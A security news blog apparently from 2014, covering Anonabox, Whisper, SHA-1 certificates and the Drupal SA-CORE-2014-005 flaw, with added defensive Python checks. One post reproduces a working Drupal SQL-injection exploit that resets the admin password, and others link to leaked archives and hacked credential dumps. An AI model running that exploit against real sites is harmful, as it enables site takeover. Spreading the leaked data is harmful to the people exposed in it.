
  • anonabox, the hyped-up new anonymizing router, is a scam

    it is now the time for many scammers to start with crowdfunded proposals that are in fact just a rip-off, but if they get hyped up by journalists who are not doing their work although they have the necessary resources or contacts, then this can turn into a big mess

    maybe these crowdfunding firms should invest a bit of their margins into testing all those propositions before presenting them to the public as investments - just as a bank has to review a company before taking its proposals online for the unsuspecting public

    from the source:

    • They are intentionally misleading the public (LYING) about the device being fully open source, while it’s not. Hardware, the most important part of the device, is not open source. It’s a Chinese knockoff of TP-Link “3G routers”, which opens the possibility of backdoors in the hardware (think of Huawei backdoors). The reason why they did so is simple: nobody would buy the device in such numbers. Everyone would just build their own device.
    • Their Tor package is actually The Grugq’s Portal (linked in edit above).
    • OpenWRT is so BADLY configured by the Anonabox team that the device that is supposed to protect you is actually giving away your information. The device has a BACKDOOR root password, an OPEN wireless network (so anyone can connect to it) and is shipped with SSHD!!! This means that anyone can take control of the device!

    http://www.techworm.net/2014/10/kickstarter-freezes-anonabox-funding.html
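    As an added example (not code from the page or from the Anonabox project), here is a small Python audit that reads the three OpenWrt artefacts the source points at and flags the three problems it lists: an open wireless network, a shipped SSH daemon and a root password that matches a known factory default. The UCI file contents, the shadow line and the set of "known default" hashes are constructed samples; the dropbear option names (enable, Port, PasswordAuth) are assumed to match the stock OpenWrt config file.

```python
import shlex


def parse_uci(text):
    """Minimal parser for OpenWrt UCI files: 'config <type> [<name>]',
    'option <key> <value>' and 'list <key> <value>' lines."""
    sections = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)
        if parts[0] == "config":
            current = {"type": parts[1], "name": parts[2] if len(parts) > 2 else None}
            sections.append(current)
        elif parts[0] == "option" and current is not None:
            current[parts[1]] = parts[2]
        elif parts[0] == "list" and current is not None:
            current.setdefault(parts[1], []).append(parts[2])
    return sections


def audit(wireless_cfg, dropbear_cfg, shadow_text, known_default_hashes):
    """Return a list of findings for an OpenWrt image; empty means nothing flagged."""
    findings = []
    # 1. open wireless network: a wifi-iface without encryption (OpenWrt treats
    #    a missing 'encryption' option as none)
    for sec in parse_uci(wireless_cfg):
        if sec["type"] == "wifi-iface" and sec.get("encryption", "none") == "none":
            findings.append("open wireless network (ssid=%s)" % sec.get("ssid", "?"))
    # 2. SSH daemon shipped and enabled (assumed option names: enable, Port, PasswordAuth)
    for sec in parse_uci(dropbear_cfg):
        if sec["type"] == "dropbear" and sec.get("enable", "1") != "0":
            findings.append("ssh daemon enabled on port %s, password auth %s"
                            % (sec.get("Port", "22"), sec.get("PasswordAuth", "on")))
    # 3. root password: empty, or identical to a hash known to ship on every unit
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if fields[0] == "root":
            if fields[1] == "":
                findings.append("root account has no password")
            elif fields[1] in known_default_hashes:
                findings.append("root password hash matches a known factory default")
    return findings


# CONSTRUCTED sample inputs, shaped like /etc/config/wireless, /etc/config/dropbear
# and /etc/shadow on an OpenWrt device
WIRELESS = """
config wifi-device 'radio0'
    option type 'mac80211'
    option channel '6'

config wifi-iface 'default_radio0'
    option device 'radio0'
    option network 'lan'
    option mode 'ap'
    option ssid 'anonabox'
    option encryption 'none'
"""
DROPBEAR = """
config dropbear
    option PasswordAuth 'on'
    option RootPasswordAuth 'on'
    option Port '22'
"""
SHADOW = "root:$1$CONSTRUCTED$exampleonlyexampleonly:16000:0:99999:7:::\n"
KNOWN_DEFAULTS = {"$1$CONSTRUCTED$exampleonlyexampleonly"}  # placeholder, not a real hash

if __name__ == "__main__":
    for finding in audit(WIRELESS, DROPBEAR, SHADOW, KNOWN_DEFAULTS):
        print("FINDING:", finding)
```

    The same three checks are what a buyer can do on any such box with a serial console or a firmware dump before trusting it, which is the point of the quoted list: the problems were visible in three plain-text files.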

  • whisper is not anonymous and doesn't protect your privacy - period

    "User data, including Whisper postings that users believe they have deleted, is collated in a searchable database. The company has no access to users’ names or phone numbers, but is storing information about the precise time and approximate location of all previous messages posted through the app. The data, which stretches back to the app’s launch in 2012, is being stored indefinitely, a practice seemingly at odds with Whisper’s stated policy of holding the data only for “a brief period of time”.

    • A team headed by Whisper’s editor-in-chief, Neetzan Zimmerman, is closely monitoring users it believes are potentially newsworthy, delving into the history of their activity on the app and tracking their movements through the mapping tool. Among the many users currently being targeted are military personnel and individuals claiming to work at Yahoo, Disney and on Capitol Hill.
    • Whisper’s policy toward sharing user data with law enforcement has prompted it on occasions to provide information to both the FBI and MI5. Both cases involved potentially imminent threats to life, Whisper said, a practice standard in the tech industry. But privacy experts who reviewed Whisper’s terms of service for the Guardian said the company appeared to require a lower legal threshold for providing user information to authorities than other tech companies.
    http://www.techworm.net/2014/10/whisper-tracking-its-users.html

    do not believe what they say but what they do, and especially after someone proves it and they don't deny it - they only change their privacy rules

  • 500MB of documents leaked from the DNR representation in Moscow #ukraine

    In the archive you will find a lot of documentation leaders DNR relations Vitrenko and presidential Ataman Rosiyiskoho KazachYestva, memoranda concerning the relationship of some pretty famous Ukrainian people and their participation in information projects NPT, including Chairman Yegor Sobolev lyustratsiynoho Committee and Deputy Chairman of the Fiscal Service of Ukraine - Mr. Vladimir Khomenko and many other very interesting material.
    https://translate.google.com

    http://bayimg.com/album/fAamMAAac

    Links to the archives

    https://anonfiles.com/file/783943b5e08f624895346123badbf904

    https://anonfiles.com/file/7dfb565f1045b36487635e2086f37046
    https://www.cyberguerrilla.org/blog/?p=20656

    Ukrainians will need some social search and translation of these documents if they want to honour the work of these cyberguerrillas

  • the other Darkweb : freenet plans a massive upgrade

    https://www.noname-ev.de/wiki/uploads/9/9b/FreenetSlides.pdf

    this is a very interesting set of slides about the technology and the future of freenet, which wants to start a massive upgrade to make surveillance a lot more difficult

  • were older windows OSes vulnerable to badusb attacks for years? (upgrade your systems)

    there is some discussion now about one of the patches in this month's package, because it seems that it was already patched years ago for windows7 and more recent systems but not for those before, and that only now is the patch being extended to these older systems

    Badusb attacks were therefore possible on these older systems for years, if the analysis is right

    it proves that for your critical systems it is always better to follow the upgrades of the OS

    source http://blog.beyondtrust.com/ms14-063-fastfat-vulnerability-fixed-years-ago

  • this is why you should patch your 64-bit windows servers immediately - rootkit already in use

    it has been in use for some time by Chinese APT gangs

    you will find the full description here http://blog.crowdstrike.com/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/

  • this is the code that is used to attack #drupal websites that aren't patched yet

    to patch, go to drupal.org and nowhere else

    this is the code that was posted on pastebin and is being used to attack drupal websites - quite simple - and scans and attacks are happening at high speed

    #Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
    #Creditz to https://www.reddit.com/user/fyukyuk
    import urllib2, sys
    from drupalpass import DrupalHash  # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py

    # usage check before the arguments are read (script name + 3 arguments)
    if len(sys.argv) != 4:
        print "host username password"
        print "http://nope.io admin wowsecure"
        sys.exit(1)
    host = sys.argv[1]
    user = sys.argv[2]
    password = sys.argv[3]
    hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
    target = '%s/?q=node&destination=node' % host
    post_data = ("name[0%20;update+users+set+name%3d'"
                 + user
                 + "'+,+pass+%3d+'"
                 + hash[:55]
                 + "'+where+uid+%3d+'1';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in")
    content = urllib2.urlopen(url=target, data=post_data).read()
    if "mb_strlen() expects parameter 1" in content:
        print "Success!\nLogin now with user:%s and pass:%s" % (user, password)

    http://pastebin.com/nDwLFV3v
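    Added example, not from the pastebin post and not Drupal code: a request-side check in Python that flags the shape of the form body used above, where a login-form field name carries an array sub-key containing SQL instead of a bare identifier (valid Drupal placeholder names are alphanumerics and underscore only, which is the rule the SA-CORE-2014-005 fix enforces). The two request bodies are constructed samples with a harmless payload; the severity labels and the form_id heuristic are my own, meant for a WAF rule or a log-replay check, not a replacement for patching.

```python
import re
from urllib.parse import parse_qsl

# key of the form  base[sub-key]  as sent by PHP/Drupal for array parameters
ARRAY_KEY = re.compile(r"^(\w+)\[(.*)\]$", re.S)
# what a placeholder-safe sub-key looks like: alphanumerics and underscore only
IDENTIFIER = re.compile(r"^\w*$")
# cheap indicators that the sub-key carries SQL rather than a stray character
SQL_HINT = re.compile(r"\b(update|insert|delete|select|union|or)\b|[;#'()\"]", re.I)


def inspect_form_body(body):
    """Inspect one URL-encoded POST body; return a list of (severity, message)."""
    findings = []
    fields = parse_qsl(body, keep_blank_values=True)
    form_id = dict(fields).get("form_id", "")
    array_names = set()
    for key, _value in fields:
        m = ARRAY_KEY.match(key)
        if not m:
            continue
        base, inner = m.group(1), m.group(2)
        array_names.add(base)
        if not IDENTIFIER.match(inner):
            severity = "high" if SQL_HINT.search(inner) else "medium"
            findings.append((severity, "array key %r: sub-key is not a bare identifier" % key))
    # the user login form expects a scalar 'name'; an array there is never legitimate
    if form_id == "user_login_block" and "name" in array_names:
        findings.append(("high", "login form submitted 'name' as an array"))
    return findings


# CONSTRUCTED sample bodies: a normal login and one shaped like the PoC above,
# with an inert sub-key instead of the real payload
BENIGN = "name=alice&pass=s3cret&form_build_id=form-abc&form_id=user_login_block&op=Log+in"
SUSPICIOUS = ("name[0%20OR%20(1%3d1)%20--%20]=bob&name[0]=larry&pass=lol"
              "&form_build_id=&form_id=user_login_block&op=Log+in")

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, inspect_form_body(body) or "clean")
```

    Only the body is inspected, so this runs on a reverse-proxy or WAF that sees POST data; a plain access log without bodies cannot tell these requests from a normal login, which is why the advice on the page is to upgrade rather than rely on filtering.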
  • why it is urgent to kill SHA1 totally to protect SHA2 from fake certs made with SHA1 (how it is done)

    this is a good explanation

    "To which I asked: "How can an attacker who can generate SHA-1 collisions make a fake cert for a site using SHA-256? And if that's true, how does updating to SHA-256 help anybody?"

    @schoen replied:

    Take a look at the analogy of MD5, the previous obsolete hash algorithm
    used to generate digital certificates.

    http://www.win.tue.nl/hashclash/rogue-ca/

    There, the attacker would generate two certificates whose content had the same MD5 value. One certificate might be for legitimate.org (which the attacker had registered), while another certificate might be for victim.com (which belongs to a third party). Because the certificates' content has the same MD5 value, if a CA signs that MD5 value, it is effectively signing both certificates (in the sense that a browser can't tell that the attacker is lying if the attacker presents the CA's signature together with the victim.com certificate instead of the legitimate.org certificate). The CA doesn't realize that it's signing the victim.com certificate because it never sees that certificate and doesn't even know that it exists.

    The effectiveness of that attack doesn't depend on what kind of certificate victim.com already has (if any) or on any of the algorithms that were intentionally used by victim.com. Even if victim.com was using SHA-256 for its cert (issued by AwesomeCA Ltd., let's say), the attacker can still get some other CA (Ancient Algorithms, Inc.?) to issue the colliding MD5 cert that refers to victim.com, and then use that cert in an attack.

    The same kinds of risks then apply to SHA-1, if we think that the same kinds of attacks will be feasible against SHA-1 that were feasible against MD5.

    So the benefit of upgrading is (as you describe it correctly on the site) that people who are trying to phase out the old algorithms can actually do so. If everybody or most everybody upgrades, then certs that use the old algorithms look suspicious (and eventually people can stop accepting them, or stop accepting some of them in particular contexts). If nobody or few people upgrade, then there's no way to distinguish between a legitimate cert with an old algorithm and a fake cert with an old algorithm. You could think of this as an ecosystemic benefit rather than a benefit to each individual site that upgrades its cert.

    There are some cases in which you can maybe get an individual site benefit, having to do with cert pinning, where you try to stop other people from accepting some purported certs for your domain if the provenance of those certs is not what you expect. I guess most site operators don't currently use those mechanisms, though.


    I'll update the copy to make this point more clear, and to link to http://www.win.tue.nl/hashclash/rogue-ca/, which is an excellent depiction of the problem.
    https://github.com/konklone/shaaaaaaaaaaaaa/issues/25

    you should also read this, because Google has decided to start taking action, beginning with Chrome https://konklone.com/post/why-google-is-hurrying-the-web-to-kill-sha-1

    all important belgian websites still use sha1, even the most important one - unless they are changing this while upgrading their ssl certificates (use ssllabs.com to test)
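    Added example, not part of the GitHub thread or of the shaaaaa project: a dependency-free Python check of a certificate's outer signature algorithm, the field that decides whether a cert is SHA-1-signed regardless of what key or ciphers the site itself uses. It walks just enough DER to read the signatureAlgorithm OID, so it can be run over a downloaded chain without a browser or ssllabs.com; sample_cert_pem() builds a constructed, certificate-shaped blob for offline use, and the OID table is limited to the RSA and ECDSA algorithms listed in it.

```python
import base64

# signature-algorithm OIDs commonly met in X.509 chains
OID_NAMES = {
    "1.2.840.113549.1.1.4": "md5WithRSAEncryption",
    "1.2.840.113549.1.1.5": "sha1WithRSAEncryption",
    "1.2.840.113549.1.1.11": "sha256WithRSAEncryption",
    "1.2.840.113549.1.1.12": "sha384WithRSAEncryption",
    "1.2.840.10045.4.1": "ecdsa-with-SHA1",
    "1.2.840.10045.4.3.2": "ecdsa-with-SHA256",
}
WEAK = {"md5WithRSAEncryption", "sha1WithRSAEncryption", "ecdsa-with-SHA1"}


def _read_tlv(buf, pos):
    """Read one DER tag-length-value at pos; return (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:  # long-form length: low bits give the byte count
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def _decode_oid(body):
    """Decode a DER OBJECT IDENTIFIER body into dotted form."""
    arcs = [body[0] // 40, body[0] % 40]
    value = 0
    for b in body[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:  # last base-128 digit of this arc
            arcs.append(value)
            value = 0
    return ".".join(map(str, arcs))


def signature_algorithm(der):
    """Name (or dotted OID) of the outer signatureAlgorithm of a DER certificate.
    Certificate ::= SEQUENCE { tbsCertificate, signatureAlgorithm, signatureValue }"""
    tag, cert, _ = _read_tlv(der, 0)
    if tag != 0x30:
        raise ValueError("not a DER SEQUENCE")
    _, _, pos = _read_tlv(cert, 0)           # tbsCertificate: skipped
    _, alg, _ = _read_tlv(cert, pos)         # AlgorithmIdentifier ::= SEQUENCE { OID, params }
    tag, oid, _ = _read_tlv(alg, 0)
    if tag != 0x06:
        raise ValueError("expected OBJECT IDENTIFIER")
    dotted = _decode_oid(oid)
    return OID_NAMES.get(dotted, dotted)


def assess_pem(pem_text):
    """Return (algorithm name, is_weak) for one PEM-encoded certificate."""
    body = "".join(l for l in pem_text.splitlines() if not l.startswith("-----"))
    name = signature_algorithm(base64.b64decode(body))
    return name, name in WEAK


# --- constructed sample data, so the check can be exercised offline ---------
def _tlv(tag, body):
    assert len(body) < 128  # short-form length is enough for the sample
    return bytes([tag, len(body)]) + body


def _encode_oid(dotted):
    arcs = [int(a) for a in dotted.split(".")]
    out = [arcs[0] * 40 + arcs[1]]
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        while arc > 0x7F:
            arc >>= 7
            chunk.append((arc & 0x7F) | 0x80)
        out.extend(reversed(chunk))
    return bytes(out)


def sample_cert_pem(sig_oid):
    """CONSTRUCTED certificate-shaped blob: dummy tbsCertificate, the given
    signature OID, dummy BIT STRING. Not a valid certificate, just enough DER."""
    tbs = _tlv(0x30, _tlv(0x02, b"\x01"))
    alg = _tlv(0x30, _tlv(0x06, _encode_oid(sig_oid)))
    sig = _tlv(0x03, b"\x00\xff")
    der = _tlv(0x30, tbs + alg + sig)
    b64 = base64.b64encode(der).decode()
    return "-----BEGIN CERTIFICATE-----\n" + b64 + "\n-----END CERTIFICATE-----\n"


if __name__ == "__main__":
    for oid in ("1.2.840.113549.1.1.5", "1.2.840.113549.1.1.11"):
        print(oid, assess_pem(sample_cert_pem(oid)))
```

    Run over every certificate in a served chain (leaf and intermediates), since one SHA-1-signed intermediate is enough for a browser to treat the whole chain as SHA-1; the root's own self-signature does not matter, as roots are trusted by identity, not by signature.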

  • the project to work on a real change of SSL security: dump TLS

    source http://clearcrypt.org/tls/

    this post also gives much more information and has a mailing list

  • the start of the project to open the software to set up UMTS (mobile phone) networks

    this is the code they will use to develop their own code, to install 'rogue' spying or free 3G networks on cheap hardware

    they will also find security mistakes, open routes and bad code in the real base stations more easily

    source https://github.com/RangeNetworks/OpenBTS-UMTS

  • dropbox hosted and protected a fake login page to dropbox that steals passwords

    this means that the security teams of dropbox - just like those of yahoo - are not doing enough to stop internal phishing campaigns, in which the users may be more easily fooled than if the mails came from other email addresses on another infrastructure under another SSL certificate

    source http://www.symantec.com/connect/blogs/dropbox-users-targeted-phishing-scam-hosted-dropbox

  • Microsoft wants to make multi-patch multi-reboot faster but makes a mess of it

    for some old-school security people like me, we remember that at first Microsoft asked for multiple reboots and each patch had its own reboot. This was sometimes a hassle, but you were sure that a patch worked even if it was one at a time, and when a patch posed problems, you just went back in time and went on to the next patch

    now Microsoft has changed this into one reboot for all the patches, and this has so many risks, because there are so many things that have to change in so many different sections of the kernel and libraries that you can never be sure that all these changes are done in the right order and don't conflict with each other

    the best thing Microsoft can do is to return to multiple reboots, or to give the possibility of multiple reboots if one chooses it or if there are problems

  • #opchina publishes huge chinese email lists (also belgians) for next waves of attacks

    #opchina is in full swing, preparing other attacks here by publishing lists of email addresses (also belgians) that will receive all kinds of trojans, phishing and password stealers in the next waves of attacks

  • hacked and leaked lovero.nl - also belgians

    the passwords are too short not to be broken, even encrypted

  • hacked and leaked (also belgians) gepl.net

    also belgians - the so-called encryption was not tested either

  • hacked and leaked : tourism Canada

    logins and passwords without email addresses

  • hacked and leaked (with belgians) hairbox.fr

    logins published

  • will Belgium become a legal host for 14+ sexporn online ?

    Today sex between kids under 16, or in which one of the two is younger than 16, is illegal. Not that this law is enforced in a very strict way, but it is something useful to have if the police is facing child porn in which the age of the kids is what porn sites call 'barely legal'.

    Now the government has decided that it will discuss the possibility of lowering the age to 14 years.

    They should make one distinction. It would be 14 years if it is 'PRIVATE' sex between two consenting people, and even better with the consent of the parents.

    If one only lowers the age, then the risk exists that it will be legal in Belgium (but for the whole world to see) to post porn with 14-year-olds, for which a certain public exists.

    We still have a long way to go in this discussion, but one should add in this internet-driven world that it is about private non-commercial sex (and that it is not private even when one has to fill in a password, be invited or whatever scam around this).

  • this is the one-year-old Drupal bug sending panic waves through Drupal land

    yep, nearly one year old

    nothing happened until somebody thought that it was interesting to use in an attack

    "

    Database ExpandArguments placeholder naming issues when using array

    When expanding an array argument in a query, the current code uses the array key values themselves to generate the query placeholders.

    This poses 3 problems:

    [1] Low degree of "repetitivity" between queries, which makes implementation of advanced query caching difficult. In the SQL Server driver we are using regex all the time to manipulate queries.

    [2] The user can easily crash the query if it includes non-placeholder-valid characters (alphanumeric + underscore) in the keys passed in the argument. So, this will break the query:

    $params[':nids'] = array(
      'uid1' => 5,
      'what a bad placeholder name why should we care ?¿?' => 6,
    );

    db_query('SELECT UID FROM USERS WHERE USERS.UID IN (:nids)', $params);

    [3] Possible door open for SQL injection?

    I've tried for a while with something like this:

    $params[':nids'] = array(
      'ok' => 5,
      'ok2) OR (1=1) OR 5 IN (5' => 6,
      'ok2' => 7
    );

    db_query('SELECT UID FROM USERS WHERE USERS.UID IN (:nids)', $params);

    But I am running SQL Server and the only way I can think of exploiting this would be using a duplicate placeholder, which MySQL swallows but SQL Server complains about. Maybe someone with MySQL can give it a try and see if they can make it work.

    Anyway, I don't understand why it is using the array keys passed by the user to generate the placeholders; it makes no sense to me.

    I've moved this to MAJOR due to points [2] and [3], feel free to downgrade.


    https://www.drupal.org/node/2146839
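    Added example (a Python model, not Drupal's PHP): the issue's own query and parameters run through two expansions of an array argument. The first splices the caller's array keys into the placeholder names, as the report describes; the second replaces the key with a sequential index, which is the approach the SA-CORE-2014-005 fix takes. An in-memory SQLite table stands in for the site database so the effect is visible in the rows returned; the USERS table and its ten rows are constructed, and string replacement is used where Drupal uses a regex.

```python
import sqlite3


def expand_arguments_vulnerable(query, args):
    """Pre-fix behaviour as the issue describes it: the caller's array KEYS
    become part of the placeholder names and therefore of the SQL text.
    (Simplified Python model of Drupal's expandArguments(), not Drupal code.)"""
    flat = {}
    for key, value in args.items():
        if not isinstance(value, dict):
            flat[key] = value
            continue
        new_keys = {"%s_%s" % (key, k): v for k, v in value.items()}
        query = query.replace(key, ", ".join("%s_%s" % (key, k) for k in value))
        flat.update(new_keys)
    return query, flat


def expand_arguments_fixed(query, args):
    """Hardened variant: a sequential index replaces the user-supplied key,
    so nothing the caller controls reaches the SQL text."""
    flat = {}
    for key, value in args.items():
        if not isinstance(value, dict):
            flat[key] = value
            continue
        new_keys = {"%s_%d" % (key, i): v for i, v in enumerate(value.values())}
        query = query.replace(key, ", ".join(new_keys))
        flat.update(new_keys)
    return query, flat


def run(query, params):
    """Execute against a CONSTRUCTED in-memory USERS table (UIDs 1..10) and
    return the UIDs the query yields, sorted."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE USERS (UID INTEGER)")
    conn.executemany("INSERT INTO USERS VALUES (?)", [(i,) for i in range(1, 11)])
    # sqlite3 wants named parameters without the leading colon; unused keys are ignored
    rows = conn.execute(query, {k.lstrip(":"): v for k, v in params.items()}).fetchall()
    conn.close()
    return sorted(r[0] for r in rows)


# the query and parameters from the issue report
QUERY = "SELECT UID FROM USERS WHERE USERS.UID IN (:nids)"
PARAMS = {":nids": {"ok": 5, "ok2) OR (1=1) OR 5 IN (5": 6, "ok2": 7}}


def compare():
    """Return {'vulnerable': uids, 'fixed': uids} for the issue's input."""
    out = {}
    for label, fn in (("vulnerable", expand_arguments_vulnerable),
                      ("fixed", expand_arguments_fixed)):
        query, params = fn(QUERY, PARAMS)
        out[label] = run(query, params)
    return out


if __name__ == "__main__":
    for label, fn in (("vulnerable", expand_arguments_vulnerable),
                      ("fixed", expand_arguments_fixed)):
        query, params = fn(QUERY, PARAMS)
        print(label, "->", query)
        print("   rows:", run(query, params))
```

    The vulnerable expansion asks for three UIDs and gets all ten back, because the key text "OR (1=1)" became part of the WHERE clause; the fixed expansion yields exactly 5, 6 and 7. That is also why the reporter's duplicate-placeholder remark matters: MySQL accepts the repeated :nids_ok2, so the injected clause survives there, while SQL Server rejected it.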

  • year-old drupal critical security bug effectively attacked now - patch available

    If you have a drupal site you should start the upgrade immediately. The drupal people say that patching alone is not enough and won't guarantee that there are no other bugs in the code. This means that you have to upgrade to the latest version, which came out yesterday.

    This is a very critical bug because it lets anyone, without any authentication, inject all the code they want into your website or even take control over your website.

    The drupal site also says that there are NO rules in the WAF (web application firewall) that are coherent enough to protect against all the different kinds of attacks that can be performed with this bug.

    On the drupal site people also say that attacks coming out of Russia (do you need traffic coming out of Russia? I don't, so I just drop it) are ongoing and permanent. Several successful attack codes are available on pastebin and elsewhere.

    This bug was in the public list of bugs for over a year before anyone took notice, and shows once again the single biggest issue with those open source projects. All the developers were at their conference when the code and attacks started (so there was some social engineering in the timing of the attacks, which is typical of modern-day professional attacks).

    https://www.drupal.org/node/2357241 

    https://www.drupal.org/SA-CORE-2014-005

    Nobody is going to complain if you put your site in maintenance mode for a short while now so you can upgrade like you should